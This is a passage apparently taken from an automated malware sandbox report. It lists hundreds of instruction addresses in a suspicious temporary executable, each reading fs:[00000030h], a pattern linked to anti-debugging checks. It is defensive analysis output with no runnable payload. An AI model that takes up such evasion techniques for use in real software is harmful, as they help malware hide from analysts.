          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01735BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01678A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01683A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01713D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01687D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
